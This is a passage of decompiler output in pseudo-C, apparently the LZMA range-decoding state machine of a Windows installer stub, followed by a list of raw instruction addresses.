                                                            													__ecx =  *(__ebp - 0x38);
                                                            													 *(__ebp - 0x84) = 0xb;
                                                            													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                            													while(1) {
                                                            														L132:
                                                            														 *(_t621 - 0x54) = _t614;
                                                            														goto L133;
                                                            													}
                                                            												}
                                                            												__eax =  *(__ebp - 0x28);
                                                            												goto L88;
                                                            											case 0xb:
                                                            												__eflags =  *(__ebp - 0x40);
                                                            												if( *(__ebp - 0x40) != 0) {
                                                            													__ecx =  *(__ebp - 0x24);
                                                            													__eax =  *(__ebp - 0x20);
                                                            													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                            												} else {
                                                            													__eax =  *(__ebp - 0x24);
                                                            												}
                                                            												__ecx =  *(__ebp - 0x28);
                                                            												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                            												L88:
                                                            												__ecx =  *(__ebp - 0x2c);
                                                            												 *(__ebp - 0x2c) = __eax;
                                                            												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                            												L89:
                                                            												__eax =  *(__ebp - 4);
                                                            												 *(__ebp - 0x80) = 0x15;
                                                            												__eax =  *(__ebp - 4) + 0xa68;
                                                            												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                            												goto L68;
                                                            											case 0xc:
                                                            												L99:
                                                            												__eflags =  *(__ebp - 0x6c);
                                                            												if( *(__ebp - 0x6c) == 0) {
                                                            													 *(__ebp - 0x88) = 0xc;
                                                            													goto L170;
                                                            												}
                                                            												__ecx =  *(__ebp - 0x70);
                                                            												__eax =  *(__ebp - 0xc);
                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                            												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                            												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            												_t334 = __ebp - 0x70;
                                                            												 *_t334 =  *(__ebp - 0x70) + 1;
                                                            												__eflags =  *_t334;
                                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            												__eax =  *(__ebp - 0x2c);
                                                            												goto L101;
                                                            											case 0xd:
                                                            												L37:
                                                            												__eflags =  *(__ebp - 0x6c);
                                                            												if( *(__ebp - 0x6c) == 0) {
                                                            													 *(__ebp - 0x88) = 0xd;
                                                            													goto L170;
                                                            												}
                                                            												__ecx =  *(__ebp - 0x70);
                                                            												__eax =  *(__ebp - 0xc);
                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                            												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                            												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            												_t122 = __ebp - 0x70;
                                                            												 *_t122 =  *(__ebp - 0x70) + 1;
                                                            												__eflags =  *_t122;
                                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            												L39:
                                                            												__eax =  *(__ebp - 0x40);
                                                            												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                            												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                            													goto L48;
                                                            												}
                                                            												__eflags = __ebx - 0x100;
                                                            												if(__ebx >= 0x100) {
                                                            													goto L54;
                                                            												}
                                                            												L41:
                                                            												__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                            												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                            												__ecx =  *(__ebp - 0x58);
                                                            												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                            												 *(__ebp - 0x48) = __eax;
                                                            												__eax = __eax + 1;
                                                            												__eax = __eax << 8;
                                                            												__eax = __eax + __ebx;
                                                            												__esi =  *(__ebp - 0x58) + __eax * 2;
                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                            												__ax =  *__esi;
                                                            												 *(__ebp - 0x54) = __esi;
                                                            												__edx = __ax & 0x0000ffff;
                                                            												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                            												__eflags =  *(__ebp - 0xc) - __ecx;
                                                            												if( *(__ebp - 0xc) >= __ecx) {
                                                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                            													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                            													__cx = __ax;
                                                            													 *(__ebp - 0x40) = 1;
                                                            													__cx = __ax >> 5;
                                                            													__eflags = __eax;
                                                            													__ebx = __ebx + __ebx + 1;
                                                            													 *__esi = __ax;
                                                            												} else {
                                                            													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                            													 *(__ebp - 0x10) = __ecx;
                                                            													0x800 = 0x800 - __edx;
                                                            													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                            													__ebx = __ebx + __ebx;
                                                            													 *__esi = __cx;
                                                            												}
                                                            												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                            												 *(__ebp - 0x44) = __ebx;
                                                            												if( *(__ebp - 0x10) >= 0x1000000) {
                                                            													goto L39;
                                                            												} else {
                                                            													goto L37;
                                                            												}
                                                            											case 0xe:
                                                            												L46:
                                                            												__eflags =  *(__ebp - 0x6c);
                                                            												if( *(__ebp - 0x6c) == 0) {
                                                            													 *(__ebp - 0x88) = 0xe;
                                                            													goto L170;
                                                            												}
                                                            												__ecx =  *(__ebp - 0x70);
                                                            												__eax =  *(__ebp - 0xc);
                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                            												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                            												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            												_t156 = __ebp - 0x70;
                                                            												 *_t156 =  *(__ebp - 0x70) + 1;
                                                            												__eflags =  *_t156;
                                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            												while(1) {
                                                            													L48:
                                                            													__eflags = __ebx - 0x100;
                                                            													if(__ebx >= 0x100) {
                                                            														break;
                                                            													}
                                                            													__eax =  *(__ebp - 0x58);
                                                            													__edx = __ebx + __ebx;
                                                            													__ecx =  *(__ebp - 0x10);
                                                            													__esi = __edx + __eax;
                                                            													__ecx =  *(__ebp - 0x10) >> 0xb;
                                                            													__ax =  *__esi;
                                                            													 *(__ebp - 0x54) = __esi;
                                                            													__edi = __ax & 0x0000ffff;
                                                            													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                            													__eflags =  *(__ebp - 0xc) - __ecx;
                                                            													if( *(__ebp - 0xc) >= __ecx) {
                                                            														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                            														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                            														__cx = __ax;
                                                            														_t170 = __edx + 1; // 0x1
                                                            														__ebx = _t170;
                                                            														__cx = __ax >> 5;
                                                            														__eflags = __eax;
                                                            														 *__esi = __ax;
                                                            													} else {
                                                            														 *(__ebp - 0x10) = __ecx;
                                                            														0x800 = 0x800 - __edi;
                                                            														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                            														__ebx = __ebx + __ebx;
                                                            														 *__esi = __cx;
                                                            													}
                                                            													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                            													 *(__ebp - 0x44) = __ebx;
                                                            													if( *(__ebp - 0x10) >= 0x1000000) {
                                                            														continue;
                                                            													} else {
                                                            														goto L46;
                                                            													}
                                                            												}
                                                            												L54:
                                                            												_t173 = __ebp - 0x34;
                                                            												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                            												__eflags =  *_t173;
                                                            												goto L55;
                                                            											case 0xf:
                                                            												L58:
                                                            												__eflags =  *(__ebp - 0x6c);
                                                            												if( *(__ebp - 0x6c) == 0) {
                                                            													 *(__ebp - 0x88) = 0xf;
                                                            													goto L170;
                                                            												}
                                                            												__ecx =  *(__ebp - 0x70);
                                                            												__eax =  *(__ebp - 0xc);
                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                            												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                            												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            												_t203 = __ebp - 0x70;
                                                            												 *_t203 =  *(__ebp - 0x70) + 1;
                                                            												__eflags =  *_t203;
                                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            												L60:
                                                            												__eflags = __ebx - 0x100;
                                                            												if(__ebx >= 0x100) {
                                                            													L55:
                                                            													__al =  *(__ebp - 0x44);
                                                            													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                            													goto L56;
                                                            												}
                                                            												L61:
                                                            												__eax =  *(__ebp - 0x58);
                                                            												__edx = __ebx + __ebx;
                                                            												__ecx =  *(__ebp - 0x10);
                                                            												__esi = __edx + __eax;
                                                            												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                            												__ax =  *__esi;
                                                            												 *(__ebp - 0x54) = __esi;
                                                            												__edi = __ax & 0x0000ffff;
                                                            												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                            												__eflags =  *(__ebp - 0xc) - __ecx;
                                                            												if( *(__ebp - 0xc) >= __ecx) {
                                                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                            													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                            													__cx = __ax;
                                                            													_t217 = __edx + 1; // 0x1
                                                            													__ebx = _t217;
                                                            													__cx = __ax >> 5;
                                                            													__eflags = __eax;
                                                            													 *__esi = __ax;
                                                            												} else {
                                                            													 *(__ebp - 0x10) = __ecx;
                                                            													0x800 = 0x800 - __edi;
                                                            													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                            													__ebx = __ebx + __ebx;
                                                            													 *__esi = __cx;
                                                            												}
                                                            												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                            												 *(__ebp - 0x44) = __ebx;
                                                            												if( *(__ebp - 0x10) >= 0x1000000) {
                                                            													goto L60;
                                                            												} else {
                                                            													goto L58;
                                                            												}
                                                            											case 0x10:
                                                            												L109:
                                                            												__eflags =  *(__ebp - 0x6c);
                                                            												if( *(__ebp - 0x6c) == 0) {
                                                            													 *(__ebp - 0x88) = 0x10;
                                                            													goto L170;
                                                            												}
                                                            												__ecx =  *(__ebp - 0x70);
                                                            												__eax =  *(__ebp - 0xc);
                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                            												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                            												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            												_t365 = __ebp - 0x70;
                                                            												 *_t365 =  *(__ebp - 0x70) + 1;
                                                            												__eflags =  *_t365;
                                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            												goto L111;
                                                            											case 0x11:
                                                            												L68:
                                                            												_t614 =  *(_t621 - 0x58);
                                                            												 *(_t621 - 0x84) = 0x12;
                                                            												while(1) {
                                                            													L132:
                                                            													 *(_t621 - 0x54) = _t614;
                                                            													goto L133;
                                                            												}
                                                            											case 0x12:
                                                            												__eflags =  *(__ebp - 0x40);
                                                            												if( *(__ebp - 0x40) != 0) {
                                                            													__eax =  *(__ebp - 0x58);
                                                            													 *(__ebp - 0x84) = 0x13;
                                                            													__esi =  *(__ebp - 0x58) + 2;
                                                            													while(1) {
                                                            														L132:
                                                            														 *(_t621 - 0x54) = _t614;
                                                            														goto L133;
                                                            													}
                                                            												}
                                                            												__eax =  *(__ebp - 0x4c);
                                                            												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                            												__ecx =  *(__ebp - 0x58);
                                                            												__eax =  *(__ebp - 0x4c) << 4;
                                                            												__eflags = __eax;
                                                            												__eax =  *(__ebp - 0x58) + __eax + 4;
                                                            												goto L130;
                                                            											case 0x13:
                                                            												__eflags =  *(__ebp - 0x40);
                                                            												if( *(__ebp - 0x40) != 0) {
                                                            													_t469 = __ebp - 0x58;
                                                            													 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                            													__eflags =  *_t469;
                                                            													 *(__ebp - 0x30) = 0x10;
                                                            													 *(__ebp - 0x40) = 8;
                                                            													L144:
                                                            													 *(__ebp - 0x7c) = 0x14;
                                                            													goto L145;
                                                            												}
                                                            												__eax =  *(__ebp - 0x4c);
                                                            												__ecx =  *(__ebp - 0x58);
                                                            												__eax =  *(__ebp - 0x4c) << 4;
                                                            												 *(__ebp - 0x30) = 8;
                                                            												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                            												L130:
                                                            												 *(__ebp - 0x58) = __eax;
                                                            												 *(__ebp - 0x40) = 3;
                                                            												goto L144;
                                                            											case 0x14:
                                                            												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                            												__eax =  *(__ebp - 0x80);
                                                            												 *(_t621 - 0x88) = _t542;
                                                            												goto L1;
                                                            											case 0x15:
                                                            												__eax = 0;
                                                            												__eflags =  *(__ebp - 0x38) - 7;
                                                            												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                            												__al = __al & 0x000000fd;
                                                            												__eax = (__eflags >= 0) - 1 + 0xb;
                                                            												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                            												goto L120;
                                                            											case 0x16:
                                                            												__eax =  *(__ebp - 0x30);
                                                            												__eflags = __eax - 4;
                                                            												if(__eax >= 4) {
                                                            													_push(3);
                                                            													_pop(__eax);
                                                            												}
                                                            												__ecx =  *(__ebp - 4);
                                                            												 *(__ebp - 0x40) = 6;
                                                            												__eax = __eax << 7;
                                                            												 *(__ebp - 0x7c) = 0x19;
                                                            												 *(__ebp - 0x58) = __eax;
                                                            												goto L145;
                                                            											case 0x17:
                                                            												L145:
                                                            												__eax =  *(__ebp - 0x40);
                                                            												 *(__ebp - 0x50) = 1;
                                                            												 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                            												goto L149;
                                                            											case 0x18:
                                                            												L146:
                                                            												__eflags =  *(__ebp - 0x6c);
                                                            												if( *(__ebp - 0x6c) == 0) {
                                                            													 *(__ebp - 0x88) = 0x18;
                                                            													goto L170;
                                                            												}
                                                            												__ecx =  *(__ebp - 0x70);
                                                            												__eax =  *(__ebp - 0xc);
                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                            												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                            												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            												_t484 = __ebp - 0x70;
                                                            												 *_t484 =  *(__ebp - 0x70) + 1;
                                                            												__eflags =  *_t484;
                                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            												L148:
                                                            												_t487 = __ebp - 0x48;
                                                            												 *_t487 =  *(__ebp - 0x48) - 1;
                                                            												__eflags =  *_t487;
                                                            												L149:
                                                            												__eflags =  *(__ebp - 0x48);
                                                            												if( *(__ebp - 0x48) <= 0) {
                                                            													__ecx =  *(__ebp - 0x40);
                                                            													__ebx =  *(__ebp - 0x50);
                                                            													0 = 1;
                                                            													__eax = 1 << __cl;
                                                            													__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                            													__eax =  *(__ebp - 0x7c);
                                                            													 *(__ebp - 0x44) = __ebx;
                                                            													while(1) {
                                                            														 *(_t621 - 0x88) = _t542;
                                                            														goto L1;
                                                            													}
                                                            												}
                                                            												__eax =  *(__ebp - 0x50);
                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                            												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                            												__eax =  *(__ebp - 0x58);
                                                            												__esi = __edx + __eax;
                                                            												 *(__ebp - 0x54) = __esi;
                                                            												__ax =  *__esi;
                                                            												__edi = __ax & 0x0000ffff;
                                                            												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                            												__eflags =  *(__ebp - 0xc) - __ecx;
                                                            												if( *(__ebp - 0xc) >= __ecx) {
                                                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                            													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                            													__cx = __ax;
                                                            													__cx = __ax >> 5;
                                                            													__eax = __eax - __ecx;
                                                            													__edx = __edx + 1;
                                                            													__eflags = __edx;
                                                            													 *__esi = __ax;
                                                            													 *(__ebp - 0x50) = __edx;
                                                            												} else {
                                                            													 *(__ebp - 0x10) = __ecx;
                                                            													0x800 = 0x800 - __edi;
                                                            													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                            													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                            													 *__esi = __cx;
                                                            												}
                                                            												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                            												if( *(__ebp - 0x10) >= 0x1000000) {
                                                            													goto L148;
                                                            												} else {
                                                            													goto L146;
                                                            												}
                                                            											case 0x19:
                                                            												__eflags = __ebx - 4;
                                                            												if(__ebx < 4) {
                                                            													 *(__ebp - 0x2c) = __ebx;
                                                            													L119:
                                                            													_t393 = __ebp - 0x2c;
                                                            													 *_t393 =  *(__ebp - 0x2c) + 1;
                                                            													__eflags =  *_t393;
                                                            													L120:
                                                            													__eax =  *(__ebp - 0x2c);
                                                            													__eflags = __eax;
                                                            													if(__eax == 0) {
                                                            														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                            														goto L170;
                                                            													}
                                                            													__eflags = __eax -  *(__ebp - 0x60);
                                                            													if(__eax >  *(__ebp - 0x60)) {
                                                            														goto L171;
                                                            													}
                                                            													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                            													__eax =  *(__ebp - 0x30);
                                                            													_t400 = __ebp - 0x60;
                                                            													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                            													__eflags =  *_t400;
                                                            													goto L123;
                                                            												}
                                                            												__ecx = __ebx;
                                                            												__eax = __ebx;
                                                            												__ecx = __ebx >> 1;
                                                            												__eax = __ebx & 0x00000001;
                                                            												__ecx = (__ebx >> 1) - 1;
                                                            												__al = __al | 0x00000002;
                                                            												__eax = (__ebx & 0x00000001) << __cl;
                                                            												__eflags = __ebx - 0xe;
                                                            												 *(__ebp - 0x2c) = __eax;
                                                            												if(__ebx >= 0xe) {
                                                            													__ebx = 0;
                                                            													 *(__ebp - 0x48) = __ecx;
                                                            													L102:
                                                            													__eflags =  *(__ebp - 0x48);
                                                            													if( *(__ebp - 0x48) <= 0) {
                                                            														__eax = __eax + __ebx;
                                                            														 *(__ebp - 0x40) = 4;
                                                            														 *(__ebp - 0x2c) = __eax;
                                                            														__eax =  *(__ebp - 4);
                                                            														__eax =  *(__ebp - 4) + 0x644;
                                                            														__eflags = __eax;
                                                            														L108:
                                                            														__ebx = 0;
                                                            														 *(__ebp - 0x58) = __eax;
                                                            														 *(__ebp - 0x50) = 1;
                                                            														 *(__ebp - 0x44) = 0;
                                                            														 *(__ebp - 0x48) = 0;
                                                            														L112:
                                                            														__eax =  *(__ebp - 0x40);
                                                            														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                            														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                            															_t391 = __ebp - 0x2c;
                                                            															 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                            															__eflags =  *_t391;
                                                            															goto L119;
                                                            														}
                                                            														__eax =  *(__ebp - 0x50);
                                                            														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                            														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                            														__eax =  *(__ebp - 0x58);
                                                            														__esi = __edi + __eax;
                                                            														 *(__ebp - 0x54) = __esi;
                                                            														__ax =  *__esi;
                                                            														__ecx = __ax & 0x0000ffff;
                                                            														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                            														__eflags =  *(__ebp - 0xc) - __edx;
                                                            														if( *(__ebp - 0xc) >= __edx) {
                                                            															__ecx = 0;
                                                            															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                            															__ecx = 1;
                                                            															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                            															__ebx = 1;
                                                            															__ecx =  *(__ebp - 0x48);
                                                            															__ebx = 1 << __cl;
                                                            															__ecx = 1 << __cl;
                                                            															__ebx =  *(__ebp - 0x44);
                                                            															__ebx =  *(__ebp - 0x44) | __ecx;
                                                            															__cx = __ax;
                                                            															__cx = __ax >> 5;
                                                            															__eax = __eax - __ecx;
                                                            															__edi = __edi + 1;
                                                            															__eflags = __edi;
                                                            															 *(__ebp - 0x44) = __ebx;
                                                            															 *__esi = __ax;
                                                            															 *(__ebp - 0x50) = __edi;
                                                            														} else {
                                                            															 *(__ebp - 0x10) = __edx;
                                                            															0x800 = 0x800 - __ecx;
                                                            															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                            															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                            															 *__esi = __dx;
                                                            														}
                                                            														__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                            														if( *(__ebp - 0x10) >= 0x1000000) {
                                                            															L111:
                                                            															_t368 = __ebp - 0x48;
                                                            															 *_t368 =  *(__ebp - 0x48) + 1;
                                                            															__eflags =  *_t368;
                                                            															goto L112;
                                                            														} else {
                                                            															goto L109;
                                                            														}
                                                            													}
                                                            													__ecx =  *(__ebp - 0xc);
                                                            													__ebx = __ebx + __ebx;
                                                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                            													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                            													 *(__ebp - 0x44) = __ebx;
                                                            													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                            														__ecx =  *(__ebp - 0x10);
                                                            														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                            														__ebx = __ebx | 0x00000001;
                                                            														__eflags = __ebx;
                                                            														 *(__ebp - 0x44) = __ebx;
                                                            													}
                                                            													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                            													if( *(__ebp - 0x10) >= 0x1000000) {
                                                            														L101:
                                                            														_t338 = __ebp - 0x48;
                                                            														 *_t338 =  *(__ebp - 0x48) - 1;
                                                            														__eflags =  *_t338;
                                                            														goto L102;
                                                            													} else {
                                                            														goto L99;
                                                            													}
                                                            												}
                                                            												__edx =  *(__ebp - 4);
                                                            												__eax = __eax - __ebx;
                                                            												 *(__ebp - 0x40) = __ecx;
                                                            												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                            												goto L108;
                                                            											case 0x1a:
                                                            												L56:
                                                            												__eflags =  *(__ebp - 0x64);
                                                            												if( *(__ebp - 0x64) == 0) {
                                                            													 *(__ebp - 0x88) = 0x1a;
                                                            													goto L170;
                                                            												}
                                                            												__ecx =  *(__ebp - 0x68);
                                                            												__al =  *(__ebp - 0x5c);
                                                            												__edx =  *(__ebp - 8);
                                                            												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                            												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                            												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                            												 *( *(__ebp - 0x68)) = __al;
                                                            												__ecx =  *(__ebp - 0x14);
                                                            												 *(__ecx +  *(__ebp - 8)) = __al;
                                                            												__eax = __ecx + 1;
                                                            												__edx = 0;
                                                            												_t192 = __eax %  *(__ebp - 0x74);
                                                            												__eax = __eax /  *(__ebp - 0x74);
                                                            												__edx = _t192;
                                                            												goto L79;
                                                            											case 0x1b:
                                                            												L75:
                                                            												__eflags =  *(__ebp - 0x64);
                                                            												if( *(__ebp - 0x64) == 0) {
                                                            													 *(__ebp - 0x88) = 0x1b;
                                                            													goto L170;
                                                            												}
                                                            												__eax =  *(__ebp - 0x14);
                                                            												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                            												__eflags = __eax -  *(__ebp - 0x74);
                                                            												if(__eax >=  *(__ebp - 0x74)) {
                                                            													__eax = __eax +  *(__ebp - 0x74);
                                                            													__eflags = __eax;
                                                            												}
                                                            												__edx =  *(__ebp - 8);
                                                            												__cl =  *(__eax + __edx);
                                                            												__eax =  *(__ebp - 0x14);
                                                            												 *(__ebp - 0x5c) = __cl;
                                                            												 *(__eax + __edx) = __cl;
                                                            												__eax = __eax + 1;
                                                            												__edx = 0;
                                                            												_t274 = __eax %  *(__ebp - 0x74);
                                                            												__eax = __eax /  *(__ebp - 0x74);
                                                            												__edx = _t274;
                                                            												__eax =  *(__ebp - 0x68);
                                                            												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                            												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                            												_t283 = __ebp - 0x64;
                                                            												 *_t283 =  *(__ebp - 0x64) - 1;
                                                            												__eflags =  *_t283;
                                                            												 *( *(__ebp - 0x68)) = __cl;
                                                            												L79:
                                                            												 *(__ebp - 0x14) = __edx;
                                                            												goto L80;
                                                            											case 0x1c:
                                                            												while(1) {
                                                            													L123:
                                                            													__eflags =  *(__ebp - 0x64);
                                                            													if( *(__ebp - 0x64) == 0) {
                                                            														break;
                                                            													}
                                                            													__eax =  *(__ebp - 0x14);
                                                            													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                            													__eflags = __eax -  *(__ebp - 0x74);
                                                            													if(__eax >=  *(__ebp - 0x74)) {
                                                            														__eax = __eax +  *(__ebp - 0x74);
                                                            														__eflags = __eax;
                                                            													}
                                                            													__edx =  *(__ebp - 8);
                                                            													__cl =  *(__eax + __edx);
                                                            													__eax =  *(__ebp - 0x14);
                                                            													 *(__ebp - 0x5c) = __cl;
                                                            													 *(__eax + __edx) = __cl;
                                                            													__eax = __eax + 1;
                                                            													__edx = 0;
                                                            													_t414 = __eax %  *(__ebp - 0x74);
                                                            													__eax = __eax /  *(__ebp - 0x74);
                                                            													__edx = _t414;
                                                            													__eax =  *(__ebp - 0x68);
                                                            													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                            													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                            													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                            													__eflags =  *(__ebp - 0x30);
                                                            													 *( *(__ebp - 0x68)) = __cl;
                                                            													 *(__ebp - 0x14) = _t414;
                                                            													if( *(__ebp - 0x30) > 0) {
                                                            														continue;
                                                            													} else {
                                                            														L80:
                                                            														 *(__ebp - 0x88) = 2;
                                                            														goto L1;
                                                            													}
                                                            												}
                                                            												 *(__ebp - 0x88) = 0x1c;
                                                            												goto L170;
                                                            										}
                                                            									}
                                                            									L171:
                                                            									_t544 = _t543 | 0xffffffff;
                                                            									goto L172;
                                                            								}
                                                            							}
                                                            						}
                                                            					}
                                                            					goto L1;
                                                            				}
                                                            			}














                                                            0x00000000
                                                            0x00406557
                                                            0x00406557
                                                            0x0040655b
                                                            0x0040657c
                                                            0x00406583
                                                            0x00406589
                                                            0x0040658f
                                                            0x004065a1
                                                            0x004065a7
                                                            0x004065ac
                                                            0x00000000
                                                            0x0040655d
                                                            0x00406563
                                                            0x00406924
                                                            0x00406924
                                                            0x00406924
                                                            0x00406927
                                                            0x00406927
                                                            0x00406927
                                                            0x0040692d
                                                            0x00406933
                                                            0x00406939
                                                            0x00406953
                                                            0x00406956
                                                            0x0040695c
                                                            0x00406967
                                                            0x00406969
                                                            0x0040693b
                                                            0x0040693b
                                                            0x0040694a
                                                            0x0040694e
                                                            0x0040694e
                                                            0x00406973
                                                            0x00000000
                                                            0x00000000
                                                            0x00406975
                                                            0x00406979
                                                            0x00406b28
                                                            0x00406b3e
                                                            0x00406b46
                                                            0x00406b4d
                                                            0x00406b4f
                                                            0x00406b56
                                                            0x00406b5a
                                                            0x00406b5a
                                                            0x00406985
                                                            0x0040698c
                                                            0x00406994
                                                            0x00406997
                                                            0x0040699a
                                                            0x0040699a
                                                            0x004069a0
                                                            0x004069a0
                                                            0x0040613c
                                                            0x0040613c
                                                            0x0040613c
                                                            0x00406145
                                                            0x00000000
                                                            0x00000000
                                                            0x0040614b
                                                            0x00000000
                                                            0x00406156
                                                            0x00000000
                                                            0x00000000
                                                            0x0040615f
                                                            0x00406162
                                                            0x00406165
                                                            0x00406169
                                                            0x00000000
                                                            0x00000000
                                                            0x0040616f
                                                            0x00406172
                                                            0x00406174
                                                            0x00406175
